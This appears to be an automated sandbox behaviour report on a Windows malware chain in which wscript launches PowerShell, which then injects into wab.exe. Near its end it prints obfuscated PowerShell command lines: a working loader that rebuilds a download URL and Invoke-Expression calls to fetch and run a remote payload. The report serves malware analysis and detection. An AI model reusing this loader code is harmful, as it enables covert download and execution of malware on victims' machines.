              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4530Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5380Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6069Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3698Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep count: 6069 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3868Thread sleep count: 3698 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
              Source: wab.exe, 00000008.00000002.2724545147.0000000000690000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2751227851.0000026F47FFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07A8A7AE LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,5_2_07A8A7AE

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_1988.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2624, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 40F0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 11FE78Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$vastities='su';$vastities+='bstrin';$vastities+='g';function concolor($weaselly){$genoptagelserne=$weaselly.length-$verdensfjerneconomatic;for($verdensfjerne=5;$verdensfjerne -lt $genoptagelserne;$verdensfjerne+=6){$tetanuses+=$weaselly.$vastities.invoke( $verdensfjerne, $verdensfjerneconomatic);}$tetanuses;}function ratlaasene($kontrasts){& ($protektionerne) ($kontrasts);}$zemas=concolor 'ka,rimmisalofor,azret.si ,ymplexponld.scoaforts/rug,k5cirku.hyp,t0stimu runds( annuwsavori cardnreguld reecohvi.ewantissprea so,mnkd,ontprodu non,l1autoe0kamer.i.otr0trans;rejse inn.wpres.ib,kenn trkn6stift4super; ef e hi,loxudst 6rygel4quidd;termo pensrprotevsiali: semi1 over2marsi1tmrer.konto0 aria),msae jeergsolodekunstcfaberk frakohypos/ lowp2tridk0bogca1vas,e0damas0 ervi1finge0diphe1stage k mplfmann iswashr g,ute,udsjfcanceofrustxsmin /premi1bered2porce1 xeno.voxe,0antip ';$egenartets=concolor 'bathmu morgsetuieemarksrdepic-haanlasagtmgathalesplitnfore,t ther ';$bogbinderi=concolor '.engehpolytttangltov rapbridgs tact:grund/optog/snkniw,rickwaftrywdevot.sregnsp rsoelnmo,n sandd .ymmsd flopdysuradaarlcvandfeimipr.bottlc af,eo n mamantid/ b.skppokinr .nsooyvonn/exs.fd ,niflprste/monop7 ightdvulcahacantiskannd .mmu7spawn ';$prakriti=concolor 'fangs>neigh ';$protektionerne=concolor 'damesigr.fie homoxm,til ';$dournesses='forureningskildens';ratlaasene (concolor 'natiosnyt iesammetpea.a-bedl,cnont o frognanskatlivreeassonn 